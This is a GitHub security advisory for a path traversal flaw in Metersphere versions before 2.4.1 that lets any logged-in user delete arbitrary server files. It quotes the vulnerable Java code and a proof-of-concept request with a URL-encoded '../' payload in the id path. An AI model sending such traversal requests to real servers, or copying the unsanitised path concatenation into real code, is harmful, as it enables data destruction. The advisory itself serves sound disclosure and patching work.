Skip to content

Path Injection in Metersphere leads to Arbitrary File Delete

Moderate
fit2-zhao published GHSA-5mwp-xw7p-5j27 Dec 9, 2022

Package

maven io.metersphere:metersphere (Maven)

Affected versions

< 2.4.1

Patched versions

2.4.1

Description

Summary

A Path Injection in ApiTestCaseService::deleteBodyFiles allows any authenticated user to delete arbitrary files on the server.

Details

Metersphere's ApiTestCaseController loads a /delete/{id} endpoint which takes a user-controlled string id and passes it to ApiTestCaseService's delete method.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/controller/definition/ApiTestCaseController.java#L127
@GetMapping("/delete/{id}")
...
public void delete(@PathVariable String id) {
    apiTestCaseService.delete(id);
}

ApiTestCaseService's delete method passes the former id (now testId) to ApiTestCaseService's deleteBodyFiles.

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L331
public void delete(String testId) {
    ...
    deleteBodyFiles(testId);
    ...
}

Which uses the user-provided value (testId) in new File(BODY_FILE_DIR + "/" + testId), being deleted later by file.delete().

// https://github.com/metersphere/metersphere/blob/165ceb70edca4c9a712aeb6b8e882270074f0736/api-test/backend/src/main/java/io/metersphere/service/definition/ApiTestCaseService.java#L365
public void deleteBodyFiles(String testId) {
    File file = new File(BODY_FILE_DIR + "/" + testId);
    FileUtil.deleteContents(file);
    if (file.exists()) {
        file.delete();
    }
}

Proof of Concept

  1. Log in with an account (can be non-administrator)
  2. Create a file that the PoC will delete:
docker exec -it $(docker ps -q --filter "name=ms-server") touch /tmp/DELETE_ME
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME
  1. Send the following request replacing the SESSION cookie and CSRF-TOKEN header:
GET /api/testcase/delete/..%2F..%2F..%2F..%2Ftmp%2FDELETE_ME HTTP/1.1
Host: 127.0.0.1:8081
CSRF-TOKEN: <CSRF-TOKEN>
Cookie: SESSION=<SESSION-COOKIE>
  1. Verify that the file was deleted:
docker exec -it $(docker ps -q --filter "name=ms-server") ls /tmp/DELETE_ME

Patches

The vulnerability has been fixed in v2.4.1.

  • b5b4c51: No longer can arbitrary files be deleted.

Workarounds

It is recommended to upgrade the version to v2.4.1.

For more information

If you have any questions or comments about this advisory, please open an issue.

Severity

Moderate
6.5
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID

CVE-2022-23512

Credits